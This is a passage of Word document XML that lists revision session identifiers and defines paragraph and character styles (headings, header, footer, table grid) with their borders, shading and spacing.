    <w:rsid w:val="000C5CDD"/>
    <w:rsid w:val="000D0246"/>
    <w:rsid w:val="000D3707"/>
    <w:rsid w:val="000D4D41"/>
    <w:rsid w:val="000D622B"/>
    <w:rsid w:val="000E0B08"/>
    <w:rsid w:val="000E709C"/>
    <w:rsid w:val="000E7281"/>
    <w:rsid w:val="000F6A7A"/>
    <w:rsid w:val="00101A36"/>
    <w:rsid w:val="00107DF5"/>
    <w:rsid w:val="0011228F"/>
    <w:rsid w:val="00113244"/>
    <w:rsid w:val="00117D69"/>
    <w:rsid w:val="00124F38"/>
    <w:rsid w:val="0012689E"/>
    <w:rsid w:val="00131919"/>
    <w:rsid w:val="001320AC"/>
    <w:rsid w:val="00133390"/>
    <w:rsid w:val="0013350F"/>
    <w:rsid w:val="00141235"/>
    <w:rsid w:val="00146555"/>
    <w:rsid w:val="00146675"/>
    <w:rsid w:val="00152D36"/>
    <w:rsid w:val="00157238"/>
    <w:rsid w:val="00167B6F"/>
    <w:rsid w:val="001756DF"/>
    <w:rsid w:val="00181D18"/>
    <w:rsid w:val="00185024"/>
    <w:rsid w:val="001945DD"/>
    <w:rsid w:val="00194961"/>
    <w:rsid w:val="001A1343"/>
    <w:rsid w:val="001A3861"/>
    <w:rsid w:val="001A665B"/>
    <w:rsid w:val="001A7FE8"/>
    <w:rsid w:val="001B3808"/>
    <w:rsid w:val="001C552B"/>
    <w:rsid w:val="001D2F68"/>
    <w:rsid w:val="001E0FD5"/>
    <w:rsid w:val="001E2175"/>
    <w:rsid w:val="001E3553"/>
    <w:rsid w:val="001F06C8"/>
    <w:rsid w:val="001F2888"/>
    <w:rsid w:val="001F4A0D"/>
    <w:rsid w:val="00201C02"/>
    <w:rsid w:val="00202A9D"/>
    <w:rsid w:val="00216025"/>
    <w:rsid w:val="00221B3C"/>
    <w:rsid w:val="00223C71"/>
    <w:rsid w:val="00225FE5"/>
    <w:rsid w:val="00231ABD"/>
    <w:rsid w:val="00235F22"/>
    <w:rsid w:val="002367D4"/>
    <w:rsid w:val="002403C8"/>
    <w:rsid w:val="002441AB"/>
    <w:rsid w:val="00244B24"/>
    <w:rsid w:val="002472B6"/>
    <w:rsid w:val="0025011C"/>
    <w:rsid w:val="00257944"/>
    <w:rsid w:val="00263524"/>
    <w:rsid w:val="00266487"/>
    <w:rsid w:val="00267FE1"/>
    <w:rsid w:val="00272493"/>
    <w:rsid w:val="00275ADB"/>
    <w:rsid w:val="002805FC"/>
    <w:rsid w:val="00290308"/>
    <w:rsid w:val="00296B2D"/>
    <w:rsid w:val="002A0633"/>
    <w:rsid w:val="002A08F6"/>
    <w:rsid w:val="002A1534"/>
    <w:rsid w:val="002A6B83"/>
    <w:rsid w:val="002B34B2"/>
    <w:rsid w:val="002B4F0D"/>
    <w:rsid w:val="002C0F2F"/>
    <w:rsid w:val="002C1860"/>
    <w:rsid w:val="002C2F8E"/>
    <w:rsid w:val="002C3AF9"/>
    <w:rsid w:val="002D152C"/>
    <w:rsid w:val="002D5864"/>
    <w:rsid w:val="002D63AF"/>
    <w:rsid w:val="002E28A9"/>
    <w:rsid w:val="002E5BD5"/>
    <w:rsid w:val="002F4E53"/>
    <w:rsid w:val="00302684"/>
    <w:rsid w:val="003073E1"/>
    <w:rsid w:val="003108AF"/>
    <w:rsid w:val="00313734"/>
    <w:rsid w:val="0032081F"/>
    <w:rsid w:val="00327274"/>
    <w:rsid w:val="00334079"/>
    <w:rsid w:val="0033430D"/>
    <w:rsid w:val="00342A92"/>
    <w:rsid w:val="00344EFA"/>
    <w:rsid w:val="003478C0"/>
    <w:rsid w:val="00353F8F"/>
    <w:rsid w:val="003564F7"/>
    <w:rsid w:val="0035793F"/>
    <w:rsid w:val="00360C37"/>
    <w:rsid w:val="00362CE8"/>
    <w:rsid w:val="003742F4"/>
    <w:rsid w:val="00376C83"/>
    <w:rsid w:val="003879F5"/>
    <w:rsid w:val="003937A7"/>
    <w:rsid w:val="0039615A"/>
    <w:rsid w:val="003968ED"/>
    <w:rsid w:val="003A7D08"/>
    <w:rsid w:val="003B12C7"/>
    <w:rsid w:val="003C0716"/>
    <w:rsid w:val="003C0871"/>
    <w:rsid w:val="003C4482"/>
    <w:rsid w:val="003C7E28"/>
    <w:rsid w:val="003D1DDB"/>
    <w:rsid w:val="003E469C"/>
    <w:rsid w:val="003F27DA"/>
    <w:rsid w:val="003F6E49"/>
    <w:rsid w:val="004328C6"/>
    <w:rsid w:val="00432D56"/>
    <w:rsid w:val="004357E2"/>
    <w:rsid w:val="00437C84"/>
    <w:rsid w:val="00442771"/>
    <w:rsid w:val="004605EF"/>
    <w:rsid w:val="004607DC"/>
    <w:rsid w:val="00460B45"/>
    <w:rsid w:val="004617FD"/>
    <w:rsid w:val="0046774A"/>
    <w:rsid w:val="00471DFE"/>
    <w:rsid w:val="00472A57"/>
    <w:rsid w:val="0047483F"/>
    <w:rsid w:val="004818BB"/>
    <w:rsid w:val="004820F4"/>
    <w:rsid w:val="00484471"/>
    <w:rsid w:val="004A0BBF"/>
    <w:rsid w:val="004A61F6"/>
    <w:rsid w:val="004A7B08"/>
    <w:rsid w:val="004B1EDD"/>
    <w:rsid w:val="004B5CAA"/>
    <w:rsid w:val="004C2FF9"/>
    <w:rsid w:val="004C4501"/>
    <w:rsid w:val="004C4550"/>
    <w:rsid w:val="004D73E6"/>
    <w:rsid w:val="004E16C0"/>
    <w:rsid w:val="004E7AC9"/>
    <w:rsid w:val="004F645E"/>
    <w:rsid w:val="00510347"/>
    <w:rsid w:val="005141BC"/>
    <w:rsid w:val="0052096D"/>
    <w:rsid w:val="005255FC"/>
    <w:rsid w:val="00527357"/>
    <w:rsid w:val="005273F1"/>
    <w:rsid w:val="005308BC"/>
    <w:rsid w:val="00530F9E"/>
    <w:rsid w:val="00533187"/>
    <w:rsid w:val="00544BC5"/>
    <w:rsid w:val="005471C7"/>
    <w:rsid w:val="00551810"/>
    <w:rsid w:val="00551A4A"/>
    <w:rsid w:val="0055207D"/>
    <w:rsid w:val="00552497"/>
    <w:rsid w:val="00560143"/>
    <w:rsid w:val="00567F97"/>
    <w:rsid w:val="00575DA2"/>
    <w:rsid w:val="0057694C"/>
    <w:rsid w:val="005818B9"/>
    <w:rsid w:val="005847F4"/>
    <w:rsid w:val="005855A0"/>
    <w:rsid w:val="005930B1"/>
    <w:rsid w:val="005A0221"/>
    <w:rsid w:val="005A1000"/>
    <w:rsid w:val="005A4EA7"/>
    <w:rsid w:val="005A6184"/>
    <w:rsid w:val="005A7B78"/>
    <w:rsid w:val="005B0AD0"/>
    <w:rsid w:val="005B2752"/>
    <w:rsid w:val="005B2C1B"/>
    <w:rsid w:val="005B583F"/>
    <w:rsid w:val="005C732B"/>
    <w:rsid w:val="005D1263"/>
    <w:rsid w:val="005E0DCD"/>
    <w:rsid w:val="005E2699"/>
    <w:rsid w:val="005E6E31"/>
    <w:rsid w:val="005F0194"/>
    <w:rsid w:val="005F03C0"/>
    <w:rsid w:val="005F31FE"/>
    <w:rsid w:val="005F6E56"/>
    <w:rsid w:val="00600CC8"/>
    <w:rsid w:val="0060716B"/>
    <w:rsid w:val="00613897"/>
    <w:rsid w:val="00613DEB"/>
    <w:rsid w:val="00614E1F"/>
    <w:rsid w:val="00624B6A"/>
    <w:rsid w:val="00633A42"/>
    <w:rsid w:val="00635444"/>
    <w:rsid w:val="0063696A"/>
    <w:rsid w:val="00643F7C"/>
    <w:rsid w:val="0064445F"/>
    <w:rsid w:val="00644DB1"/>
    <w:rsid w:val="0065547B"/>
    <w:rsid w:val="00656FF8"/>
    <w:rsid w:val="00660273"/>
    <w:rsid w:val="006610A1"/>
    <w:rsid w:val="006752DB"/>
    <w:rsid w:val="0067543F"/>
    <w:rsid w:val="00677F25"/>
    <w:rsid w:val="006807E4"/>
    <w:rsid w:val="00683A02"/>
    <w:rsid w:val="006879FF"/>
    <w:rsid w:val="00691684"/>
    <w:rsid w:val="00693466"/>
    <w:rsid w:val="006A11AE"/>
    <w:rsid w:val="006A2271"/>
    <w:rsid w:val="006A248D"/>
    <w:rsid w:val="006A473C"/>
    <w:rsid w:val="006A6E45"/>
    <w:rsid w:val="006B17CC"/>
    <w:rsid w:val="006B7F42"/>
    <w:rsid w:val="006C6263"/>
    <w:rsid w:val="006C7316"/>
    <w:rsid w:val="006D0F03"/>
    <w:rsid w:val="006D29D3"/>
    <w:rsid w:val="006E015D"/>
    <w:rsid w:val="006E4225"/>
    <w:rsid w:val="006E520B"/>
    <w:rsid w:val="006F0CBD"/>
    <w:rsid w:val="006F504D"/>
    <w:rsid w:val="006F58E6"/>
    <w:rsid w:val="006F5EC2"/>
    <w:rsid w:val="006F6676"/>
    <w:rsid w:val="006F6FFC"/>
    <w:rsid w:val="007017D0"/>
    <w:rsid w:val="0070501F"/>
    <w:rsid w:val="00715BC1"/>
    <w:rsid w:val="007210CB"/>
    <w:rsid w:val="0072118B"/>
    <w:rsid w:val="007214A0"/>
    <w:rsid w:val="0072446B"/>
    <w:rsid w:val="00726A14"/>
    <w:rsid w:val="00744EF8"/>
    <w:rsid w:val="00751F39"/>
    <w:rsid w:val="007530EF"/>
    <w:rsid w:val="00756BEF"/>
    <w:rsid w:val="00761629"/>
    <w:rsid w:val="00761D4C"/>
    <w:rsid w:val="00763ADF"/>
    <w:rsid w:val="00773259"/>
    <w:rsid w:val="0077581F"/>
    <w:rsid w:val="00780346"/>
    <w:rsid w:val="007811B2"/>
    <w:rsid w:val="00782BFE"/>
    <w:rsid w:val="00784814"/>
    <w:rsid w:val="00791C39"/>
    <w:rsid w:val="00792A8E"/>
    <w:rsid w:val="007B2404"/>
    <w:rsid w:val="007B52F7"/>
    <w:rsid w:val="007C242D"/>
    <w:rsid w:val="007C3103"/>
    <w:rsid w:val="007D4FDF"/>
    <w:rsid w:val="007D5294"/>
    <w:rsid w:val="007E6788"/>
    <w:rsid w:val="007E69EA"/>
    <w:rsid w:val="007F1B8E"/>
    <w:rsid w:val="00807A8C"/>
    <w:rsid w:val="008101EA"/>
    <w:rsid w:val="00815621"/>
    <w:rsid w:val="008207F8"/>
    <w:rsid w:val="00826704"/>
    <w:rsid w:val="00833DB6"/>
    <w:rsid w:val="00841579"/>
    <w:rsid w:val="00842AA6"/>
    <w:rsid w:val="00845F48"/>
    <w:rsid w:val="00846B03"/>
    <w:rsid w:val="008535C4"/>
    <w:rsid w:val="00853B6F"/>
    <w:rsid w:val="008567A2"/>
    <w:rsid w:val="00861408"/>
    <w:rsid w:val="00872532"/>
    <w:rsid w:val="008832E5"/>
    <w:rsid w:val="008861E7"/>
    <w:rsid w:val="00886B10"/>
    <w:rsid w:val="008903C8"/>
    <w:rsid w:val="00891F6F"/>
    <w:rsid w:val="00893C8A"/>
    <w:rsid w:val="008946CD"/>
    <w:rsid w:val="00896B29"/>
    <w:rsid w:val="008B01E2"/>
    <w:rsid w:val="008B3C61"/>
    <w:rsid w:val="008B4415"/>
    <w:rsid w:val="008B5E66"/>
    <w:rsid w:val="008B6588"/>
    <w:rsid w:val="008C1F35"/>
    <w:rsid w:val="008F3364"/>
    <w:rsid w:val="008F39B1"/>
    <w:rsid w:val="008F72DE"/>
    <w:rsid w:val="009014B8"/>
    <w:rsid w:val="00902CBE"/>
    <w:rsid w:val="00902ED2"/>
    <w:rsid w:val="0090384C"/>
    <w:rsid w:val="00903BA3"/>
    <w:rsid w:val="00903CB7"/>
    <w:rsid w:val="00905881"/>
    <w:rsid w:val="00907887"/>
    <w:rsid w:val="009120AA"/>
    <w:rsid w:val="00920678"/>
    <w:rsid w:val="00923CBA"/>
    <w:rsid w:val="009260D8"/>
    <w:rsid w:val="0093063C"/>
    <w:rsid w:val="00930A18"/>
    <w:rsid w:val="00933AC9"/>
    <w:rsid w:val="00937389"/>
    <w:rsid w:val="009507B8"/>
    <w:rsid w:val="0095162C"/>
    <w:rsid w:val="009736B5"/>
    <w:rsid w:val="00981AA8"/>
    <w:rsid w:val="00982963"/>
    <w:rsid w:val="00985311"/>
    <w:rsid w:val="009869DE"/>
    <w:rsid w:val="00986F0E"/>
    <w:rsid w:val="00991A38"/>
    <w:rsid w:val="00993775"/>
    <w:rsid w:val="00993D92"/>
    <w:rsid w:val="009A2985"/>
    <w:rsid w:val="009A62D8"/>
    <w:rsid w:val="009B35FC"/>
    <w:rsid w:val="009B6800"/>
    <w:rsid w:val="009B6F78"/>
    <w:rsid w:val="009C6761"/>
    <w:rsid w:val="009D1767"/>
    <w:rsid w:val="009D1C14"/>
    <w:rsid w:val="009D3344"/>
    <w:rsid w:val="009D59B4"/>
    <w:rsid w:val="009D67B4"/>
    <w:rsid w:val="009E0CBF"/>
    <w:rsid w:val="009F4BD0"/>
    <w:rsid w:val="009F5F8A"/>
    <w:rsid w:val="00A1008C"/>
    <w:rsid w:val="00A147CB"/>
    <w:rsid w:val="00A16F24"/>
    <w:rsid w:val="00A17629"/>
    <w:rsid w:val="00A21249"/>
    <w:rsid w:val="00A23672"/>
    <w:rsid w:val="00A24DBB"/>
    <w:rsid w:val="00A2638D"/>
    <w:rsid w:val="00A26CDD"/>
    <w:rsid w:val="00A30871"/>
    <w:rsid w:val="00A41024"/>
    <w:rsid w:val="00A5394C"/>
    <w:rsid w:val="00A5701B"/>
    <w:rsid w:val="00A57263"/>
    <w:rsid w:val="00A60AFC"/>
    <w:rsid w:val="00A739CA"/>
    <w:rsid w:val="00A80ADE"/>
    <w:rsid w:val="00A81319"/>
    <w:rsid w:val="00A83C63"/>
    <w:rsid w:val="00A94EED"/>
    <w:rsid w:val="00A9546B"/>
    <w:rsid w:val="00AA355C"/>
    <w:rsid w:val="00AB30AD"/>
    <w:rsid w:val="00AB5611"/>
    <w:rsid w:val="00AB5E9A"/>
    <w:rsid w:val="00AC0C2A"/>
    <w:rsid w:val="00AC7312"/>
    <w:rsid w:val="00AD6023"/>
    <w:rsid w:val="00AE08B3"/>
    <w:rsid w:val="00AE1A3A"/>
    <w:rsid w:val="00AE50CE"/>
    <w:rsid w:val="00AE570B"/>
    <w:rsid w:val="00AF3B16"/>
    <w:rsid w:val="00B046C1"/>
    <w:rsid w:val="00B063F5"/>
    <w:rsid w:val="00B17832"/>
    <w:rsid w:val="00B221F8"/>
    <w:rsid w:val="00B23D01"/>
    <w:rsid w:val="00B259DF"/>
    <w:rsid w:val="00B3221C"/>
    <w:rsid w:val="00B3349A"/>
    <w:rsid w:val="00B45D7E"/>
    <w:rsid w:val="00B47797"/>
    <w:rsid w:val="00B565EB"/>
    <w:rsid w:val="00B60046"/>
    <w:rsid w:val="00B6288A"/>
    <w:rsid w:val="00B64017"/>
    <w:rsid w:val="00B70A1E"/>
    <w:rsid w:val="00B74F93"/>
    <w:rsid w:val="00B82BD3"/>
    <w:rsid w:val="00B83011"/>
    <w:rsid w:val="00B84ADE"/>
    <w:rsid w:val="00B86A15"/>
    <w:rsid w:val="00BA1643"/>
    <w:rsid w:val="00BA569F"/>
    <w:rsid w:val="00BA76CC"/>
    <w:rsid w:val="00BB06AD"/>
    <w:rsid w:val="00BB6BB6"/>
    <w:rsid w:val="00BC2315"/>
    <w:rsid w:val="00BC3D22"/>
    <w:rsid w:val="00BC4A27"/>
    <w:rsid w:val="00BC77E2"/>
    <w:rsid w:val="00BC7D75"/>
    <w:rsid w:val="00BD7505"/>
    <w:rsid w:val="00BE0227"/>
    <w:rsid w:val="00BE3C86"/>
    <w:rsid w:val="00BE56C0"/>
    <w:rsid w:val="00BE7FC1"/>
    <w:rsid w:val="00BF0F21"/>
    <w:rsid w:val="00BF16AA"/>
    <w:rsid w:val="00C01C65"/>
    <w:rsid w:val="00C01F57"/>
    <w:rsid w:val="00C1432D"/>
    <w:rsid w:val="00C3658A"/>
    <w:rsid w:val="00C46258"/>
    <w:rsid w:val="00C465E3"/>
    <w:rsid w:val="00C50935"/>
    <w:rsid w:val="00C6106C"/>
    <w:rsid w:val="00C62378"/>
    <w:rsid w:val="00C6403F"/>
    <w:rsid w:val="00C71519"/>
    <w:rsid w:val="00C71F1F"/>
    <w:rsid w:val="00C737B7"/>
    <w:rsid w:val="00C73922"/>
    <w:rsid w:val="00C85D40"/>
    <w:rsid w:val="00C86D89"/>
    <w:rsid w:val="00C87504"/>
    <w:rsid w:val="00C95518"/>
    <w:rsid w:val="00CA07DA"/>
    <w:rsid w:val="00CB172B"/>
    <w:rsid w:val="00CB58F8"/>
    <w:rsid w:val="00CD0B0B"/>
    <w:rsid w:val="00CD6E2A"/>
    <w:rsid w:val="00CE16AE"/>
    <w:rsid w:val="00CE3738"/>
    <w:rsid w:val="00CE571D"/>
    <w:rsid w:val="00CE6B89"/>
    <w:rsid w:val="00D02471"/>
    <w:rsid w:val="00D02B4B"/>
    <w:rsid w:val="00D12381"/>
    <w:rsid w:val="00D14C2D"/>
    <w:rsid w:val="00D20CFC"/>
    <w:rsid w:val="00D22A65"/>
    <w:rsid w:val="00D3686B"/>
    <w:rsid w:val="00D368FC"/>
    <w:rsid w:val="00D371C9"/>
    <w:rsid w:val="00D42A60"/>
    <w:rsid w:val="00D50ED9"/>
    <w:rsid w:val="00D570A1"/>
    <w:rsid w:val="00D6171B"/>
    <w:rsid w:val="00D66331"/>
    <w:rsid w:val="00D72583"/>
    <w:rsid w:val="00D7288E"/>
    <w:rsid w:val="00D74EE2"/>
    <w:rsid w:val="00D812B8"/>
    <w:rsid w:val="00D81E59"/>
    <w:rsid w:val="00D81F3B"/>
    <w:rsid w:val="00D83D1F"/>
    <w:rsid w:val="00D85EF7"/>
    <w:rsid w:val="00D86F59"/>
    <w:rsid w:val="00D93839"/>
    <w:rsid w:val="00D94774"/>
    <w:rsid w:val="00DA46E2"/>
    <w:rsid w:val="00DC28C9"/>
    <w:rsid w:val="00DC5F89"/>
    <w:rsid w:val="00DD4B48"/>
    <w:rsid w:val="00DE5DE3"/>
    <w:rsid w:val="00DF430E"/>
    <w:rsid w:val="00DF73D0"/>
    <w:rsid w:val="00E044C8"/>
    <w:rsid w:val="00E103A9"/>
    <w:rsid w:val="00E14ECC"/>
    <w:rsid w:val="00E23C8B"/>
    <w:rsid w:val="00E256F2"/>
    <w:rsid w:val="00E25E8E"/>
    <w:rsid w:val="00E3054E"/>
    <w:rsid w:val="00E30D33"/>
    <w:rsid w:val="00E31A41"/>
    <w:rsid w:val="00E3269B"/>
    <w:rsid w:val="00E34E42"/>
    <w:rsid w:val="00E462B9"/>
    <w:rsid w:val="00E513CE"/>
    <w:rsid w:val="00E51BCC"/>
    <w:rsid w:val="00E54940"/>
    <w:rsid w:val="00E56AFF"/>
    <w:rsid w:val="00E57526"/>
    <w:rsid w:val="00E602A4"/>
    <w:rsid w:val="00E61621"/>
    <w:rsid w:val="00E63005"/>
    <w:rsid w:val="00E67946"/>
    <w:rsid w:val="00E67C72"/>
    <w:rsid w:val="00E67FBF"/>
    <w:rsid w:val="00E71457"/>
    <w:rsid w:val="00E847BD"/>
    <w:rsid w:val="00E84D1E"/>
    <w:rsid w:val="00E86B67"/>
    <w:rsid w:val="00E91F3D"/>
    <w:rsid w:val="00E92810"/>
    <w:rsid w:val="00E92B08"/>
    <w:rsid w:val="00E92C4E"/>
    <w:rsid w:val="00E9336A"/>
    <w:rsid w:val="00E95D1D"/>
    <w:rsid w:val="00EA0BC0"/>
    <w:rsid w:val="00EA1DF1"/>
    <w:rsid w:val="00EA4113"/>
    <w:rsid w:val="00EB11E0"/>
    <w:rsid w:val="00EB2811"/>
    <w:rsid w:val="00EB3FE8"/>
    <w:rsid w:val="00EC11B5"/>
    <w:rsid w:val="00EC64A2"/>
    <w:rsid w:val="00EC6818"/>
    <w:rsid w:val="00EC7A9B"/>
    <w:rsid w:val="00ED051E"/>
    <w:rsid w:val="00ED31C5"/>
    <w:rsid w:val="00EE4EC8"/>
    <w:rsid w:val="00EE6236"/>
    <w:rsid w:val="00EE63DE"/>
    <w:rsid w:val="00EE64B2"/>
    <w:rsid w:val="00EF1791"/>
    <w:rsid w:val="00EF680C"/>
    <w:rsid w:val="00F012EA"/>
    <w:rsid w:val="00F01C2E"/>
    <w:rsid w:val="00F026A9"/>
    <w:rsid w:val="00F0464E"/>
    <w:rsid w:val="00F07A34"/>
    <w:rsid w:val="00F13DB7"/>
    <w:rsid w:val="00F24723"/>
    <w:rsid w:val="00F3080E"/>
    <w:rsid w:val="00F32801"/>
    <w:rsid w:val="00F35BDF"/>
    <w:rsid w:val="00F406E7"/>
    <w:rsid w:val="00F425C3"/>
    <w:rsid w:val="00F44319"/>
    <w:rsid w:val="00F462CD"/>
    <w:rsid w:val="00F57878"/>
    <w:rsid w:val="00F61761"/>
    <w:rsid w:val="00F63663"/>
    <w:rsid w:val="00F70177"/>
    <w:rsid w:val="00F77A67"/>
    <w:rsid w:val="00F813EE"/>
    <w:rsid w:val="00F8371D"/>
    <w:rsid w:val="00F83B0B"/>
    <w:rsid w:val="00F845CE"/>
    <w:rsid w:val="00F86D9A"/>
    <w:rsid w:val="00F90A24"/>
    <w:rsid w:val="00F9339E"/>
    <w:rsid w:val="00F93ADC"/>
    <w:rsid w:val="00FA00EF"/>
    <w:rsid w:val="00FA128E"/>
    <w:rsid w:val="00FA14C1"/>
    <w:rsid w:val="00FA3072"/>
    <w:rsid w:val="00FA3FA5"/>
    <w:rsid w:val="00FB06AA"/>
    <w:rsid w:val="00FB19F4"/>
    <w:rsid w:val="00FB31E8"/>
    <w:rsid w:val="00FB4A76"/>
    <w:rsid w:val="00FB5B19"/>
    <w:rsid w:val="00FD4E07"/>
    <w:rsid w:val="00FD7135"/>
    <w:rsid w:val="00FD7773"/>
    <w:rsid w:val="00FE1D0B"/>
    <w:rsid w:val="00FE7A3C"/>
    <w:rsid w:val="00FF16BD"/>
    <w:rsid w:val="1058512F"/>
    <w:rsid w:val="10DC3199"/>
    <w:rsid w:val="121BE71D"/>
    <w:rsid w:val="16491B49"/>
    <w:rsid w:val="16605F49"/>
    <w:rsid w:val="17DA51C8"/>
    <w:rsid w:val="18DFE310"/>
    <w:rsid w:val="19E8B48D"/>
    <w:rsid w:val="2AE151BA"/>
    <w:rsid w:val="2DE630DC"/>
    <w:rsid w:val="2E1957B1"/>
    <w:rsid w:val="346293CF"/>
    <w:rsid w:val="361FA204"/>
    <w:rsid w:val="3770FE80"/>
    <w:rsid w:val="38BE143F"/>
    <w:rsid w:val="43B982BE"/>
    <w:rsid w:val="46140852"/>
    <w:rsid w:val="4871F515"/>
    <w:rsid w:val="4A970435"/>
    <w:rsid w:val="4C62618B"/>
    <w:rsid w:val="507EDC2D"/>
    <w:rsid w:val="5253130B"/>
    <w:rsid w:val="55637B0C"/>
    <w:rsid w:val="58CB014E"/>
    <w:rsid w:val="5A0CAE7F"/>
    <w:rsid w:val="5B287488"/>
    <w:rsid w:val="5BABF79A"/>
    <w:rsid w:val="5CB2729A"/>
    <w:rsid w:val="618AAA15"/>
    <w:rsid w:val="6456DE0E"/>
    <w:rsid w:val="67A9CA00"/>
    <w:rsid w:val="6B711AE2"/>
    <w:rsid w:val="70BE2899"/>
    <w:rsid w:val="72898C3E"/>
    <w:rsid w:val="729234C5"/>
    <w:rsid w:val="74BD20AD"/>
    <w:rsid w:val="7EA495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1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87"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003A7D08"/>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spacing w:after="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D74EE2"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="24" w:space="0" w:color="595959" w:themeColor="text1" w:themeTint="A6"/>
        <w:left w:val="single" w:sz="24" w:space="0" w:color="595959" w:themeColor="text1" w:themeTint="A6"/>
        <w:bottom w:val="single" w:sz="24" w:space="0" w:color="595959" w:themeColor="text1" w:themeTint="A6"/>
        <w:right w:val="single" w:sz="24" w:space="0" w:color="595959" w:themeColor="text1" w:themeTint="A6"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="595959" w:themeFill="text1" w:themeFillTint="A6"/>
      <w:spacing w:before="100" w:line="276" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Heading2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="004328C6"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="24" w:space="0" w:color="767171" w:themeColor="background2" w:themeShade="80"/>
        <w:left w:val="single" w:sz="24" w:space="0" w:color="767171" w:themeColor="background2" w:themeShade="80"/>
        <w:bottom w:val="single" w:sz="24" w:space="0" w:color="767171" w:themeColor="background2" w:themeShade="80"/>
        <w:right w:val="single" w:sz="24" w:space="0" w:color="767171" w:themeColor="background2" w:themeShade="80"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="767171" w:themeFill="background2" w:themeFillShade="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00991A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91A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91A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91A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91A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1A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4EE2"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NoSpacingChar">
    <w:name w:val="No Spacing Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoSpacing"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00D74EE2"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A17629"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A17629"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A17629"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A17629"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00F90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08"/>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D74EE2"/>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="595959" w:themeFill="text1" w:themeFillTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004328C6"/>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:color w:val="FFFFFF" w:themeColor="background1"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="767171" w:themeFill="background2" w:themeFillShade="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
